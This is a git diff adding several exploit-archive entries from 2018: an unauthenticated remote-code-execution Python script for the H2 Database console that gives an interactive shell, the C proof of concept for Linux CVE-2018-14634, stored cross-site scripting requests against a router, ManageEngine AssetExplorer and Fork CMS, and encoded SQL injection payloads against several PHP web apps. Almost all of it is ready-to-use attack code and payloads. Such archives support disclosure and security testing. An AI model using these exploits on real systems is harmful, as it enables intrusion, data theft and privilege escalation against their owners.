diff --git a/exploits/hardware/webapps/45515.txt b/exploits/hardware/webapps/45515.txt
new file mode 100644
index 000000000..8a6ccbf44
--- /dev/null
+++ b/exploits/hardware/webapps/45515.txt
@@ -0,0 +1,30 @@
+# Exploit Title: Billion ADSL Router 400G 20151105641 - Cross-Site Scripting
+# Author: Cakes
+# Discovery Date: 2018-09-30
+# Vendor Homepage: http://www.billion.com
+# Software Link: http://billionfirmware.co.za
+# Tested Version: 20151105641
+# Tested on OS: Kali Linux
+# CVE: N/A
+
+# Description:
+# Improper input validation on the router web interface allows attackers add a persistent
+# Cross-Site scripting attack on the IP Interface field when adding a new static route.
+# Simply intercept a new static route request and add in the XSS
+
+# Poc
+
+POST /configuration/edit-list.html HTTP/1.1
+Host: Target
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+DNT: 1
+Referer: http://Target/configuration/edit-list.html
+Authorization: Basic YWRtaW46YWRtaW4=
+Connection: close
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 93
+
+nodename=&destination=0.0.0.0&netmask=0.0.0.0&gateway=0.0.0.1&interface=&cost=1&action=create
\ No newline at end of file
diff --git a/exploits/java/webapps/45506.py b/exploits/java/webapps/45506.py
new file mode 100755
index 000000000..764406261
--- /dev/null
+++ b/exploits/java/webapps/45506.py
@@ -0,0 +1,139 @@
+# Exploit Title: H2 Database 1.4.196 - Remote Code Execution
+# Google Dork: N/A
+# Date: 2018-09-24
+# Exploit Author: h4ckNinja
+# Vendor Homepage: https://www.h2database.com/
+# Software Link: http://www.h2database.com/h2-2018-03-18.zip
+# Version: 1.4.196 and 1.4.197
+# Tested on: macOS/Linux
+# CVE: N/A
+
+# This takes advantage of the CREATE ALIAS RCE (https://www.exploit-db.com/exploits/44422/).
+# When the test database has a password that is unknown, it is still possible to get the execution
+# by creating a new database. The web console allows this by entering the name of the new database
+# in the connection string. When the new database is created, the default credentials of
+# username “sa” and password “” (blank) are created. The attacker is logged in automatically.
+# The attached Python code, modified from 44422, demonstrates this.
+
+#!/usr/bin/env python
+
+'''
+Exploit Title: Unauthenticated RCE
+Date: 2018/09/24
+Exploit Author: h4ckNinja
+Vendor: http://www.h2database.com/
+Version: all versions
+Tested on: Linux, Mac
+Description: Building on the Alias RCE, there's an authentication bypass to create a database, and then login to that one.
+Modified from: https://www.exploit-db.com/exploits/44422/
+'''
+
+import random
+import string
+import sys
+import argparse
+import html
+import requests
+
+
+def getSession(host):
+ url = 'http://{}'.format(host)
+ r = requests.get(url)
+ path = r.text.split('href = ')[1].split(';')[0].replace("'","").replace('.jsp', '.do')
+
+ return '{}/{}'.format(url, path)
+
+def login(url, database):
+ data = {
+ 'language': 'en',
+ 'setting': 'Generic H2 (Embedded)',
+ 'name': 'Generic H2 (Embedded)',
+ 'driver': 'org.h2.Driver',
+ 'url': database,
+ 'user': 'sa',
+ 'password': ''
+ }
+
+ print('[*] Attempting to create database')
+ r = requests.post(url, data=data)
+
+ if '
Login | ' in r.text:
+ return False
+
+ print('[+] Created database and logged in')
+
+ return True
+
+def prepare(url):
+ cmd = '''CREATE ALIAS EXECVE AS $$ String execve(String cmd) throws java.io.IOException { java.util.Scanner s = new java.util.Scanner(Runtime.getRuntime().exec(cmd).getInputStream()).useDelimiter("\\\\A"); return s.hasNext() ? s.next() : ""; }$$;'''
+ url = url.replace('login', 'query')
+
+ print('[*] Sending stage 1')
+
+ r = requests.post(url, data={'sql': cmd})
+
+ if not 'NullPointerException' in r.text:
+ print('[+] Shell succeeded - ^c or quit to exit')
+ return url
+
+ return False
+
+def execve(url, cmd):
+ r = requests.post(url, data={'sql':"CALL EXECVE('{}')".format(cmd)})
+
+ try:
+ execHTML = html.unescape(r.text.split('')[1].split(' | ')[0].replace('
','\n').replace(' ',' ')).encode('utf-8').decode('utf-8','ignore')
+ print(execHTML)
+
+ except Exception as e:
+ print('[-] Invalid command (' + str(e) + ')')
+
+
+if __name__ == "__main__":
+ parser = argparse.ArgumentParser()
+ randString = ''.join(random.choices(string.ascii_letters + string.digits, k=5))
+
+ parser.add_argument('-H',
+ '--host',
+ dest='host',
+ metavar='127.0.0.1:8082',
+ help='Specify a host',
+ required=True)
+
+ parser.add_argument('-d',
+ '--database-url',
+ dest='database',
+ metavar='jdbc:h2:~/emptydb-' + randString,
+ default='jdbc:h2:~/emptydb-' + randString,
+ help='Database URL',
+ required=False)
+
+ args = parser.parse_args()
+
+url = getSession(args.host)
+
+if login(url, args.database):
+ success = prepare(url)
+
+ if success:
+ while True:
+ try:
+ cmd = input('h2-shell$ ')
+
+ if 'quit' not in cmd:
+ execve(success, cmd)
+
+ else:
+ print('[+] Shutting down')
+ sys.exit(0)
+
+ except KeyboardInterrupt:
+ print()
+ print('[+] Shutting down')
+ sys.exit(0)
+
+ else:
+ print('[-] Something went wrong injecting the payload.')
+
+else:
+ print('[-] Unable to login')
\ No newline at end of file
diff --git a/exploits/java/webapps/45507.txt b/exploits/java/webapps/45507.txt
new file mode 100644
index 000000000..038039b8b
--- /dev/null
+++ b/exploits/java/webapps/45507.txt
@@ -0,0 +1,30 @@
+# Exploit Title: ManageEngine AssetExplorer 6.2.0 - Cross-Site Scripting
+# Date: 2018-09-26
+# Exploit Author: Ismail Tasdelen
+# Vendor Homepage: https://www.manageengine.com/
+# Hardware Link : https://www.manageengine.com/products/asset-explorer/
+# Software : ZOHO Corp ManageEngine AssetExplorer 6.2.0
+# Product Version: 6.2.0
+# Vulernability Type : Cross-Site Scripting
+# Vulenrability : Stored XSS
+# CVE : N/A
+
+#In Zoho ManageEngine AssetExplorer, a Stored XSS vulnerability was discovered in the 6.2.0
+# version via the /AssetDef.do ciName or assetName parameter.
+
+# HTTP Request Header :
+
+POST /AssetDef.do HTTP/1.1
+Host: TARGET
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: http://TARGET/AssetDef.do
+Cookie: JSESSIONID=70D4D1E08E51E5401B3E8FE1D17CAE9D; JSESSIONIDSSO=01AE09FF54B9B733107CD17E6D4079D7; sdp=8cb6d209-54e0-41cc-8bb2-1d462c6d3b72; nonitassetslinks=hide; Components=hide; virtual=hide; viewlinks=hide; Softwarediv=hide; barcodeDiv=hide; itassetslinks=show; %5Bobject%20HTMLTableRowElement%5D=hide; %5Bobject%20HTMLTableElement%5D=hide
+Connection: close
+Upgrade-Insecure-Requests: 1
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 705
+
+typeId=9&ciTypeId=21&ciId=null&ciName=%22%3E%3Cimg+src%3Dx+onerror%3Dalert%28%22ismailtasdelen%22%29%3E&assetName=%22%3E%3Cimg+src%3Dx+onerror%3Dalert%28%22ismailtasdelen%22%29%3E&componentID=301&CI_BaseElement_ATTRIBUTE_302=&CI_BaseElement_IMPACTID=null&ciDescription=&activeStateId=2&isStateChange=&resourceState=1&assignedType=Assign&asset=0&user=0&department=0&leaseStart=&leaseEnd=&site=-1&location=&vendorID=0&assetPrice=0&assetTag=&acqDate=&assetSerialNo=&expDate=&assetBarCode=&warrantyExpDate=&udfName3=&depreciationTypeId=&declinePercent=&usefulLife=&depreciationPercent=&salvageValue=&isProductInfoChanged=&assetID=&previousSite=&addAsset=Save&purchasecost=&modifycost=true&oldAssociatedVendor=
\ No newline at end of file
diff --git a/exploits/linux/local/45516.c b/exploits/linux/local/45516.c
new file mode 100644
index 000000000..b07af0189
--- /dev/null
+++ b/exploits/linux/local/45516.c
@@ -0,0 +1,298 @@
+/*
+EDB-Note: Systems with less than 32GB of RAM are unlikely to be affected by this issue, due to memory demands during exploitation.
+EDB Note: poc-exploit.c
+*/
+
+/*
+ * poc-exploit.c for CVE-2018-14634
+ * Copyright (C) 2018 Qualys, Inc.
+ *
+ * This program is free software: you can redistribute it and/or modify
+ * it under the terms of the GNU General Public License as published by
+ * the Free Software Foundation, either version 3 of the License, or
+ * (at your option) any later version.
+ *
+ * This program is distributed in the hope that it will be useful,
+ * but WITHOUT ANY WARRANTY; without even the implied warranty of
+ * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+ * GNU General Public License for more details.
+ *
+ * You should have received a copy of the GNU General Public License
+ * along with this program. If not, see .
+ */
+
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+
+#define MAPCOUNT_ELF_CORE_MARGIN (5)
+#define DEFAULT_MAX_MAP_COUNT (USHRT_MAX - MAPCOUNT_ELF_CORE_MARGIN)
+
+#define PAGESZ ((size_t)4096)
+#define MAX_ARG_STRLEN ((size_t)128 << 10)
+#define MAX_ARG_STRINGS ((size_t)0x7FFFFFFF)
+
+#define die() do { \
+ fprintf(stderr, "died in %s: %u\n", __func__, __LINE__); \
+ exit(EXIT_FAILURE); \
+} while (0)
+
+int
+main(void)
+{
+ if (sizeof(size_t) != sizeof(uint64_t)) die();
+ const size_t alpha = 512;
+ const size_t sprand = 8192;
+ const size_t beta = (size_t)9 << 10;
+ const size_t items = (size_t)1 << 31;
+ const size_t offset = items * sizeof(uintptr_t);
+
+ #define LLP "LD_LIBRARY_PATH=."
+ static char preload_env[MAX_ARG_STRLEN];
+ {
+ char * const sp = stpcpy(preload_env, "LD_PRELOAD=");
+ char * cp = preload_env + sizeof(preload_env);
+ size_t n;
+ for (n = 1; n <= (size_t)(cp - sp) / sizeof(LLP); n++) {
+ size_t i;
+ for (i = n; i; i--) {
+ *--cp = (n == 1) ? '\0' : (i == n) ? ':' : '0';
+ cp -= sizeof(LLP)-1;
+ memcpy(cp, LLP, sizeof(LLP)-1);
+ }
+ }
+ memset(sp, ':', (size_t)(cp - sp));
+ if (memchr(preload_env, '\0', sizeof(preload_env)) !=
+ preload_env + sizeof(preload_env)-1) die();
+ }
+ const char * const protect_envp[] = {
+ preload_env,
+ };
+ const size_t protect_envc = sizeof(protect_envp) / sizeof(protect_envp[0]);
+ size_t _protect_envsz = 0;
+ {
+ size_t i;
+ for (i = 0; i < protect_envc; i++) {
+ _protect_envsz += strlen(protect_envp[i]) + 1;
+ }
+ }
+ const size_t protect_envsz = _protect_envsz;
+
+ const size_t scratch_envsz = (size_t)1 << 20;
+ const size_t scratch_envc = scratch_envsz / MAX_ARG_STRLEN;
+ if (scratch_envsz % MAX_ARG_STRLEN) die();
+ static char scratch_env[MAX_ARG_STRLEN];
+ memset(scratch_env, ' ', sizeof(scratch_env)-1);
+
+ const size_t onebyte_envsz = (size_t)256 << 10;
+ const size_t onebyte_envc = onebyte_envsz / 1;
+
+ const size_t padding_envsz = offset + alpha;
+ /***/ size_t padding_env_rem = padding_envsz % MAX_ARG_STRLEN;
+ const size_t padding_envc = padding_envsz / MAX_ARG_STRLEN + !!padding_env_rem;
+ static char padding_env[MAX_ARG_STRLEN];
+ memset(padding_env, ' ', sizeof(padding_env)-1);
+ static char padding_env1[MAX_ARG_STRLEN];
+ if (padding_env_rem) memset(padding_env1, ' ', padding_env_rem-1);
+
+ const size_t envc = protect_envc + scratch_envc + onebyte_envc + padding_envc;
+ if (envc > MAX_ARG_STRINGS) die();
+
+ const size_t argc = items - (1 + 1 + envc + 1);
+ if (argc > MAX_ARG_STRINGS) die();
+
+ const char * const protect_argv[] = {
+ "./poc-suidbin",
+ };
+ const size_t protect_argc = sizeof(protect_argv) / sizeof(protect_argv[0]);
+ if (protect_argc >= argc) die();
+ size_t _protect_argsz = 0;
+ {
+ size_t i;
+ for (i = 0; i < protect_argc; i++) {
+ _protect_argsz += strlen(protect_argv[i]) + 1;
+ }
+ }
+ const size_t protect_argsz = _protect_argsz;
+
+ const size_t padding_argc = argc - protect_argc;
+ const size_t padding_argsz = (offset - beta) - (alpha + sprand / 2 +
+ protect_argsz + protect_envsz + scratch_envsz + onebyte_envsz / 2);
+ const size_t padding_arg_len = padding_argsz / padding_argc;
+ /***/ size_t padding_arg_rem = padding_argsz % padding_argc;
+ if (padding_arg_len >= MAX_ARG_STRLEN) die();
+ if (padding_arg_len < 1) die();
+ static char padding_arg[MAX_ARG_STRLEN];
+ memset(padding_arg, ' ', padding_arg_len-1);
+ static char padding_arg1[MAX_ARG_STRLEN];
+ memset(padding_arg1, ' ', padding_arg_len);
+
+ const char ** const envp = calloc(envc + 1, sizeof(char *));
+ if (!envp) die();
+ {
+ size_t envi = 0;
+ size_t i;
+ for (i = 0; i < protect_envc; i++) {
+ envp[envi++] = protect_envp[i];
+ }
+ for (i = 0; i < scratch_envc; i++) {
+ envp[envi++] = scratch_env;
+ }
+ for (i = 0; i < onebyte_envc; i++) {
+ envp[envi++] = "";
+ }
+ for (i = 0; i < padding_envc; i++) {
+ if (padding_env_rem) {
+ envp[envi++] = padding_env1;
+ padding_env_rem = 0;
+ } else {
+ envp[envi++] = padding_env;
+ }
+ }
+ if (envi != envc) die();
+ if (envp[envc] != NULL) die();
+ if (padding_env_rem) die();
+ }
+
+ const size_t filemap_size = ((padding_argc - padding_arg_rem) * sizeof(char *) / (DEFAULT_MAX_MAP_COUNT / 2) + PAGESZ-1) & ~(PAGESZ-1);
+ const size_t filemap_nptr = filemap_size / sizeof(char *);
+ char filemap_name[] = _PATH_TMP "argv.XXXXXX";
+ const int filemap_fd = mkstemp(filemap_name);
+ if (filemap_fd <= -1) die();
+ if (unlink(filemap_name)) die();
+ {
+ size_t i;
+ for (i = 0; i < filemap_nptr; i++) {
+ const char * const ptr = padding_arg;
+ if (write(filemap_fd, &ptr, sizeof(ptr)) != (ssize_t)sizeof(ptr)) die();
+ }
+ }
+ {
+ struct stat st;
+ if (fstat(filemap_fd, &st)) die();
+ if ((size_t)st.st_size != filemap_size) die();
+ }
+
+ const char ** const argv = mmap(NULL, (argc + 1) * sizeof(char *), PROT_READ, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
+ if (argv == MAP_FAILED) die();
+ if (protect_argc > PAGESZ / sizeof(char *)) die();
+ if (mmap(argv, PAGESZ, PROT_READ | PROT_WRITE, MAP_FIXED | MAP_PRIVATE | MAP_ANONYMOUS, -1, 0) != argv) die();
+ {
+ size_t argi = 0;
+ {
+ size_t i;
+ for (i = 0; i < protect_argc; i++) {
+ argv[argi++] = protect_argv[i];
+ }
+ }
+ {
+ size_t n = padding_argc;
+ while (n) {
+ void * const argp = &argv[argi];
+ if (((uintptr_t)argp & (PAGESZ-1)) == 0) {
+ if (padding_arg_rem || n < filemap_nptr) {
+ if (mmap(argp, PAGESZ, PROT_READ | PROT_WRITE, MAP_FIXED | MAP_PRIVATE | MAP_ANONYMOUS, -1, 0) != argp) die();
+ } else {
+ if (mmap(argp, filemap_size, PROT_READ, MAP_FIXED | MAP_PRIVATE, filemap_fd, 0) != argp) die();
+ argi += filemap_nptr;
+ n -= filemap_nptr;
+ continue;
+ }
+ }
+ if (padding_arg_rem) {
+ argv[argi++] = padding_arg1;
+ padding_arg_rem--;
+ } else {
+ argv[argi++] = padding_arg;
+ }
+ n--;
+ }
+ }
+ if (argi != argc) die();
+ if (argv[argc] != NULL) die();
+ if (padding_arg_rem) die();
+ }
+
+ {
+ static const struct rlimit stack_limit = {
+ .rlim_cur = RLIM_INFINITY,
+ .rlim_max = RLIM_INFINITY,
+ };
+ if (setrlimit(RLIMIT_STACK, &stack_limit)) die();
+ }
+ execve(argv[0], (char * const *)argv, (char * const *)envp);
+ die();
+}
+
+/*
+EDB Note: EOF poc-exploit.c
+*/
+
+
+
+
+/*
+EDB Note: poc-suidbin.c
+*/
+
+
+/*
+ * poc-suidbin.c for CVE-2018-14634
+ * Copyright (C) 2018 Qualys, Inc.
+ *
+ * This program is free software: you can redistribute it and/or modify
+ * it under the terms of the GNU General Public License as published by
+ * the Free Software Foundation, either version 3 of the License, or
+ * (at your option) any later version.
+ *
+ * This program is distributed in the hope that it will be useful,
+ * but WITHOUT ANY WARRANTY; without even the implied warranty of
+ * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+ * GNU General Public License for more details.
+ *
+ * You should have received a copy of the GNU General Public License
+ * along with this program. If not, see .
+ */
+
+#include
+#include
+#include
+
+#define die() do { \
+ fprintf(stderr, "died in %s: %u\n", __func__, __LINE__); \
+ exit(EXIT_FAILURE); \
+} while (0)
+
+int
+main(const int argc, const char * const * const argv, const char * const * const envp)
+{
+ printf("argc %d\n", argc);
+
+ char stack = '\0';
+ printf("stack %p < %p < %p < %p < %p\n", &stack, argv, envp, *argv, *envp);
+
+ #define LLP "LD_LIBRARY_PATH"
+ const char * const llp = getenv(LLP);
+ printf("getenv %p %s\n", llp, llp);
+
+ const char * const * env;
+ for (env = envp; *env; env++) {
+ if (!strncmp(*env, LLP, sizeof(LLP)-1)) {
+ printf("%p %s\n", *env, *env);
+ }
+ }
+ exit(EXIT_SUCCESS);
+}
+
+/*
+EDB Note: EOF poc-suidbin.c
+*/
\ No newline at end of file
diff --git a/exploits/php/webapps/45508.txt b/exploits/php/webapps/45508.txt
new file mode 100644
index 000000000..3ce1751b6
--- /dev/null
+++ b/exploits/php/webapps/45508.txt
@@ -0,0 +1,29 @@
+# Exploit Title: Fork CMS 5.4.0 - Cross-Site Scripting
+# Date: 2018-09-26
+# Exploit Author: Ismail Tasdelen
+# Vendor Homepage: https://www.fork-cms.com/
+# Software Link : https://github.com/forkcms/forkcms
+# Software : Fork 5.4.0
+# Product Version: 5.4.0
+# Vulernability Type : Code Injection
+# Vulenrability : HTML Injection and Stored XSS
+
+# In the 5.4.0 version of the Fork CMS software, HTML Injection and Stored XSS vulnerabilities
+# were discovered via the /backend/ajax URI.
+
+# HTTP POST Request :
+
+POST /backend/ajax HTTP/1.1
+Host: Target
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:62.0) Gecko/20100101 Firefox/62.0
+Accept: application/json, text/javascript, */*; q=0.01
+Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
+Accept-Encoding: gzip, deflate
+Referer: https://Target/private/en/pages/add?token=2quwpxbx78
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+X-Requested-With: XMLHttpRequest
+Content-Length: 299
+Cookie: track=s%3A32%3A%22e36b0c664ad21e30c493893c3612f5cc%22%3B; PHPSESSID=1103079034ec4a8e726bea6a0746731e; interface_language=en; frontend_language=en; track=1; jstree_open=page-425
+Connection: close
+
+fork%5Bmodule%5D=Core&fork%5Baction%5D=GenerateUrl&fork%5Blanguage%5D=en&url=%22%3E%3Ch1%3EIsmail+Tasdelen%3C%2Fh1%3E&metaId=&baseFieldName=title&custom=1&className=Backend%5CModules%5CPages%5CEngine%5CModel&methodName=getUrl¶meters=a%3A3%3A%7Bi%3A0%3Bi%3A0%3Bi%3A1%3Bi%3A0%3Bi%3A2%3Bb%3A0%3B%7D
\ No newline at end of file
diff --git a/exploits/php/webapps/45509.txt b/exploits/php/webapps/45509.txt
new file mode 100644
index 000000000..e1777ada6
--- /dev/null
+++ b/exploits/php/webapps/45509.txt
@@ -0,0 +1,19 @@
+# Exploit Title: Hotel Booking Engine 1.0 - 'h_room_type' SQL Injection
+# Dork: N/A
+# Exploit Author: Ihsan Sencan
+# Date: 2018-10-01
+# Vendor Homepage: http://scriptzee.com/
+# Software Link: http://scriptzee.com/products/details/35
+# Version: 1.0
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: CVE-N/A
+
+# POC:
+# http://localhost/[PATH]/hotels?h_room_type=[SQL]
+
+%27%20%41%4e%44%20%28%53%45%4c%45%43%54%20%36%36%20%46%52%4f%4d%28%53%45%4c%45%43%54%20%43%4f%55%4e%54%28%2a%29%2c%43%4f%4e%43%41%54%28%28%53%45%4c%45%43%54%20%28%45%4c%54%28%36%36%3d%36%36%2c%31%29%29%29%2c%43%4f%4e%43%41%54%5f%57%53%28%30%78%32%30%33%61%32%30%2c%55%53%45%52%28%29%2c%44%41%54%41%42%41%53%45%28%29%2c%56%45%52%53%49%4f%4e%28%29%29%2c%46%4c%4f%4f%52%28%52%41%4e%44%28%30%29%2a%32%29%29%78%20%46%52%4f%4d%20%49%4e%46%4f%52%4d%41%54%49%4f%4e%5f%53%43%48%45%4d%41%2e%50%4c%55%47%49%4e%53%20%47%52%4f%55%50%20%42%59%20%78%29%61%29%2d%2d%20%45%66%65
+
+# http://localhost/[PATH]/hotels?destination=[SQL]
+
+' AND (SELECT 66 FROM(SELECT COUNT(*),CONCAT((SELECT (ELT(66=66,1))),CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'efe'='efe
\ No newline at end of file
diff --git a/exploits/php/webapps/45510.txt b/exploits/php/webapps/45510.txt
new file mode 100644
index 000000000..3694332e8
--- /dev/null
+++ b/exploits/php/webapps/45510.txt
@@ -0,0 +1,23 @@
+# Exploit Title: Education Website 1.0 - 'subject' SQL Injection
+# Dork: N/A
+# Date: 2018-10-01
+# Exploit Author: Ihsan Sencan
+# Vendor Homepage: http://scriptzee.com/
+# Software Link: http://scriptzee.com/products/details/34
+# Version: 1.0
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+
+# POC:
+# http://localhost/[PATH]/college_list.html?subject=[SQL]
+
+-7'+/*!11111UNION*/(/*!11111SELECT*/0x283129%2c0x283229%2c0x283329%2c0x283429%2c0x283529%2c0x283629%2c(Select+export_set(5,@:=0,(select+count(*)/*!11111from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2))%2c0x283829%2c0x283929%2c0x28313029%2c0x28313129%2c0x28313229%2c0x28313329%2c0x28313429%2c0x28313529%2c0x28313629%2c0x28313729%2c0x28313829%2c0x28313929%2c0x28323029%2c0x28323129%2c0x28323229%2c0x28323329%2c0x28323429%2c0x28323529%2c0x28323629%2c0x28323729%2c0x28323829%2c0x28323929%2c0x28333029%2c0x28333129%2c0x28333229%2c0x28333329%2c0x28333429%2c0x28333529%2c0x28333629%2c0x28333729%2c0x28333829%2c0x28333929%2c0x28343029%2c0x28343129%2c0x28343229%2c0x28343329%2c0x28343429%2c0x28343529%2c0x28343629%2c0x28343729%2c0x28343829%2c0x28343929%2c0x28353029)--+-
+
+# http://localhost/[PATH]/college_list.html?city=[SQL]
+
+'+/*!44444UNION*/(/*!44444SELECT*/0x283129%2c0x283229%2c0x283329%2c0x283429%2c0x283529%2c0x283629%2c(Select+export_set(5,@:=0,(select+count(*)/*!44444from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2))%2c0x283829%2c0x283929%2c0x28313029%2c0x28313129%2c0x28313229%2c0x28313329%2c0x28313429%2c0x28313529%2c0x28313629%2c0x28313729%2c0x28313829%2c0x28313929%2c0x28323029%2c0x28323129%2c0x28323229%2c0x28323329%2c0x28323429%2c0x28323529%2c0x28323629%2c0x28323729%2c0x28323829%2c0x28323929%2c0x28333029%2c0x28333129%2c0x28333229%2c0x28333329%2c0x28333429%2c0x28333529%2c0x28333629%2c0x28333729%2c0x28333829%2c0x28333929%2c0x28343029%2c0x28343129%2c0x28343229%2c0x28343329%2c0x28343429%2c0x28343529%2c0x28343629%2c0x28343729%2c0x28343829%2c0x28343929%2c0x28353029)--+-
+
+# http://localhost/[PATH]/college_list.html?country=[SQL]
+
+'+/*!22222UNION*/(/*!22222SELECT*/0x283129%2c0x283229%2c0x283329%2c0x283429%2c0x283529%2c0x283629%2c(select(select+concat(@:=0xa7,(select+count(*)from(information_schema.columns)where(@:=concat(@,0x3c6c693e,table_name,0x3a,column_name))),@)))%2c0x283829%2c0x283929%2c0x28313029%2c0x28313129%2c0x28313229%2c0x28313329%2c0x28313429%2c0x28313529%2c0x28313629%2c0x28313729%2c0x28313829%2c0x28313929%2c0x28323029%2c0x28323129%2c0x28323229%2c0x28323329%2c0x28323429%2c0x28323529%2c0x28323629%2c0x28323729%2c0x28323829%2c0x28323929%2c0x28333029%2c0x28333129%2c0x28333229%2c0x28333329%2c0x28333429%2c0x28333529%2c0x28333629%2c0x28333729%2c0x28333829%2c0x28333929%2c0x28343029%2c0x28343129%2c0x28343229%2c0x28343329%2c0x28343429%2c0x28343529%2c0x28343629%2c0x28343729%2c0x28343829%2c0x28343929%2c0x28353029)--+-
\ No newline at end of file
diff --git a/exploits/php/webapps/45511.txt b/exploits/php/webapps/45511.txt
new file mode 100644
index 000000000..dccd65611
--- /dev/null
+++ b/exploits/php/webapps/45511.txt
@@ -0,0 +1,26 @@
+# Exploit Title: Singleleg MLM Software 1.0 - 'msg_id' SQL Injection
+# Dork: N/A
+# Date: 2018-10-01
+# Exploit Author: Ihsan Sencan
+# Vendor Homepage: http://mlmsoftwarez.in/
+# Software Link: http://mlmdemo.biz/singleleg/root.html
+# Software Link: http://mlmdemo.biz/autopool/root.html
+# Software Link: http://mlmdemo.biz/gift/root.html
+# Software Link: http://mlmdemo.biz/investment/root.html
+# Software Link: http://mlmdemo.biz/bidding/root.html
+# Software Link: http://mlmdemo.biz/adclicking/root.html
+# Software Link: http://mlmdemo.biz/repurchase/root.html
+# Software Link: http://mlmdemo.biz/moneyorderplan/root.html
+# Software Link: http://mlmdemo.biz/level/root.html
+# Version: 1.0
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# Affected Products: Singleleg MLM Software 1.0, Autopool MLM Software 1.0, Gift MLM Software 1.0
+# Investmen MLM Software 1.0, Bidding MLM Software 1.0, ADD Clicking MLM Software 1.0
+# Repurchase MLM Software 1.0, Moneyorder MLM Software 1.0, Level MLM Software 1.0
+# CVE: N/A
+
+# POC:
+# http://localhost/[PATH]/member/readmsg.php?msg_id=[SQL]
+
+%2d%74%65%73%74%35%27%20%20%55%4e%49%4f%4e%28%53%45%4c%45%43%54%28%31%29%2c%28%32%29%2c%28%33%29%2c%28%34%29%2c%28%35%29%2c%28%36%29%2c%43%4f%4e%43%41%54%5f%57%53%28%30%78%32%30%33%61%32%30%2c%55%53%45%52%28%29%2c%44%41%54%41%42%41%53%45%28%29%2c%56%45%52%53%49%4f%4e%28%29%29%2c%28%38%29%2c%28%39%29%2c%28%31%30%29%2c%28%31%31%29%2c%28%31%32%29%2c%28%31%33%29%2c%28%31%34%29%2c%28%31%35%29%29%2d%2d%20%2d
\ No newline at end of file
diff --git a/exploits/php/webapps/45512.txt b/exploits/php/webapps/45512.txt
new file mode 100644
index 000000000..8b632c4ce
--- /dev/null
+++ b/exploits/php/webapps/45512.txt
@@ -0,0 +1,15 @@
+# Exploit Title: Binary MLM Software 1.0 - 'pid' SQL Injection
+# Dork: N/A
+# Date: 2018-10-01
+# Exploit Author: Ihsan Sencan
+# Vendor Homepage: http://mlmsoftwarez.in/
+# Software Link: http://mlmdemo.biz/binary/root.html
+# Version: 1.0
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+
+# POC:
+# http://localhost/[PATH]/member/tree.php?pid=[SQL]
+
+%2d%74%65%73%74%35%27%20%20%55%4e%49%4f%4e%28%53%45%4c%45%43%54%28%31%29%2c%28%32%29%2c%28%33%29%2c%28%34%29%2c%28%35%29%2c%28%36%29%2c%43%4f%4e%43%41%54%5f%57%53%28%30%78%32%30%33%61%32%30%2c%55%53%45%52%28%29%2c%44%41%54%41%42%41%53%45%28%29%2c%56%45%52%53%49%4f%4e%28%29%29%2c%28%38%29%2c%28%39%29%2c%28%31%30%29%2c%28%31%31%29%2c%28%31%32%29%2c%28%31%33%29%2c%28%31%34%29%2c%28%31%35%29%29%2d%2d%20%2d
\ No newline at end of file
diff --git a/exploits/php/webapps/45513.txt b/exploits/php/webapps/45513.txt
new file mode 100644
index 000000000..335c41189
--- /dev/null
+++ b/exploits/php/webapps/45513.txt
@@ -0,0 +1,19 @@
+# Exploit Title: Flippa Marketplace Clone 1.0 - 'date_started' SQL Injection
+# Dork: N/A
+# Date: 2018-10-01
+# Exploit Author: Ihsan Sencan
+# Vendor Homepage: http://scriptzee.com/
+# Software Link: http://scriptzee.com/products/details/15
+# Version: 1.0
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+
+# POC:
+# http://localhost/[PATH]/site-search?sortBy=date_started[SQL]
+
+%20%41%4e%44%20%45%58%54%52%41%43%54%56%41%4c%55%45%28%32%31%31%39%2c%43%4f%4e%43%41%54%28%30%78%35%63%2c%43%4f%4e%43%41%54%5f%57%53%28%30%78%32%30%33%61%32%30%2c%55%53%45%52%28%29%2c%44%41%54%41%42%41%53%45%28%29%2c%56%45%52%53%49%4f%4e%28%29%29%2c%28%53%45%4c%45%43%54%20%28%45%4c%54%28%36%36%3d%36%36%2c%31%29%29%29%29%29
+
+# http://localhost/[PATH]/site-search?sortDir=desc[SQL]
+
